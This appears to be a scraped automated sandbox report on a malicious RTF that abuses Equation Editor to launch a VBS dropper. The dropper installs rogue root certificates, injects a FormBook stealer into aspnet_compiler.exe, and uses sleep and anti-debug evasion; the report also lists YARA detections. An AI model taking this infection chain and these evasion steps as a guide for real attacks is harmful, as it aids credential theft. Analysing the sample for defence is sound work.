          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: eMJ2QgQF4u.LNK.0.drLNK file: ..\..\..\..\..\Desktop\eMJ2QgQF4u.rtf
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdb source: temp_executable.exe, 00000006.00000002.378697765.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378311864.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdbBSJB source: wscript.exe, 00000005.00000003.378978935.000000000312F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363758912.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363766209.0000000003124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379207138.0000000003440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379086218.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000000.364483377.0000000000A82000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.5.dr
          Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\DEMONCODER.pdbBSJB source: temp_executable.exe, 00000006.00000002.378697765.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000002.378311864.00000000002B0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\owner\Documents\CryptoObfuscator_Output\WHJHHGDJHJKSKAJD.pdb source: wscript.exe, 00000005.00000003.378978935.000000000312F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363758912.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.363766209.0000000003124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379207138.0000000003440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.379086218.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000006.00000000.364483377.0000000000A82000.00000020.00000001.01000000.00000007.sdmp, temp_executable.exe.5.dr
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00588C1A push eax; ret 2_2_00588C1B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00588C12 push eax; ret 2_2_00588C13
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00578F60 push eax; retf 2_2_00578F61
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00588DEE push eax; ret 2_2_00588DEF
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00588DE6 push eax; ret 2_2_00588DE7
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00580FBA push eax; retn 0057h2_2_00581001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00407041 push cs; iretd 7_2_00407042
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041705E push edi; iretd 7_2_00417060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004030F0 push eax; ret 7_2_004030F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C8FC push cs; iretd 7_2_0041C8C9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401949 push 63DCA26Ah; ret 7_2_0040194E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040214B push edx; retf 7_2_0040214E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00402101 push ebp; iretd 7_2_0040210D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040210E push eax; retf 7_2_0040214A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004021A4 push eax; retf 7_2_0040214A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041125B pushfd ; ret 7_2_0041125E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004242D9 push esp; ret 7_2_00424330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004242E3 push esp; ret 7_2_00424330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401AB8 push edx; retf 7_2_00401AE3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00413416 push ecx; iretd 7_2_00413417
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041ECDC push ds; iretd 7_2_0041ECDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401DF5 push ebp; iretd 7_2_00401DB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401DA6 push ebp; iretd 7_2_00401DB2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00416EAA push esp; retf 7_2_00416EAB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401F0D push eax; retf 7_2_00401F19
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401FEB push edx; retf 7_2_00401FEC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00410FEE push ebp; iretd 7_2_00411000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00410FF3 push ebp; iretd 7_2_00411000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401FA4 push edx; ret 7_2_00401FAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00401FBA push 0000006Ah; iretd 7_2_00401FC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0091DFA1 push ecx; ret 7_2_0091DFB4

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\temp_executable.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 180000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: 410000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00960101 rdtsc 7_2_00960101
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeWindow / User API: threadDelayed 3930Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeWindow / User API: threadDelayed 357Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3360Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exe TID: 3576Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3652Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3652Thread sleep time: -4200000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3656Thread sleep count: 3930 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3656Thread sleep count: 357 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3652Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3604Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3668Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3776Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00960101 rdtsc 7_2_00960101
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009107AC NtCreateMutant,LdrInitializeThunk,7_2_009107AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00900080 mov ecx, dword ptr fs:[00000030h]7_2_00900080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009000EA mov eax, dword ptr fs:[00000030h]7_2_009000EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_009226F8 mov eax, dword ptr fs:[00000030h]7_2_009226F8
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeQueries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformationJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.383140999.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
